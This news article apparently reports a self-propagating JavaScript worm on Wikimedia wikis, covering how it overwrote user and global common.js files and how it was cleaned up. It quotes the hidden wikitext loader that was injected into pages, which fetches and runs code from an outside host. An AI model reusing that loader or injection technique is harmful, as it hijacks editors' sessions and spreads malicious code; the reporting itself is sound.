The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began vandalizing pages and modifying user scripts across multiple wikis.

Editors first reported the incident on Wikipedia's Village Pump (technical), where users noticed a large number of automated edits adding hidden scripts and vandalism to random pages.

Wikimedia engineers temporarily restricted editing across projects while they investigated the attack and began reverting changes.

The JavaScript worm

According to Wikimedia's Phabricator issue tracker, it appears the incident started after a malicious script hosted on Russian Wikipedia was executed, causing a global JavaScript script on Wikipedia to be modified with malicious code.

The malicious script was stored at User:Ololoshka562/test.js [Archive], first uploaded in March 2024 and allegedly associated with scripts used in previous attacks on wiki projects.

Based on edit histories reviewed by BleepingComputer, the script is believed to have been executed for the first time by a Wikimedia employee account earlier today while testing user-script functionality. It is not currently known whether the script was executed intentionally, accidentally loaded during testing, or triggered by a compromised account.

BleepingComputer's review of the archived test.js script shows it self-propagates by injecting malicious JavaScript loaders into both a logged-in user's common.js and Wikipedia's global MediaWiki:Common.js, which is used by everyone.

MediaWiki allows both global and user-specific JavaScript files, such as MediaWiki:Common.js and User:<username>/common.js, which are executed in editors’ browsers to customize the wiki interface.

After the initial test.js script was loaded in a logged-in editor's browser, it attempted to modify two scripts using that editor's session and privileges:

• User-level persistence: it tried to overwrite User:<username>/common.js with a loader that would automatically load the test.js script whenever that user browses the wiki while logged in.
• Site-wide persistence: If the user had the right privileges, it would also edit the global MediaWiki:Common.js script, so that it would run for every editor that uses the global script.

If the global script was successfully modified, anyone loading it would automatically execute the loader, which would then repeat the same steps, including infecting their own common.js, as shown below.

The script also includes functionality to edit a random page by requesting one via the Special:Random wiki command, then editing the page to insert an image and the following hidden JavaScript loader.

[[File:Woodpecker10.jpg|5000px]]
<span style="display:none">
[[#%3Cscript%3E$.getScript('//basemetrika.ru/s/e41')%3C/script%3E]]
</span>

According to BleepingComputer's analysis, approximately 3,996 pages were modified, and around 85 users had their common.js files replaced during the security incident. It is unknown how many pages were deleted.

As the worm spread, engineers temporarily restricted editing across projects while reverting the malicious changes and removing references to the injected scripts.

During the cleanup, Wikimedia Foundation staff members also rolled back the common.js for numerous users across the platform. These modified pages have now been "supressed" and are no longer visible in the change histories.

At the time of writing, the injected code has been removed, and editing is once again possible.

However, Wikimedia has not yet published a detailed post-incident report explaining exactly how the dormant script was executed or how widely the worm propagated before it was contained.

BleepingComputer contacted Wikimedia with questions about the incident, but has not received a reply at this time.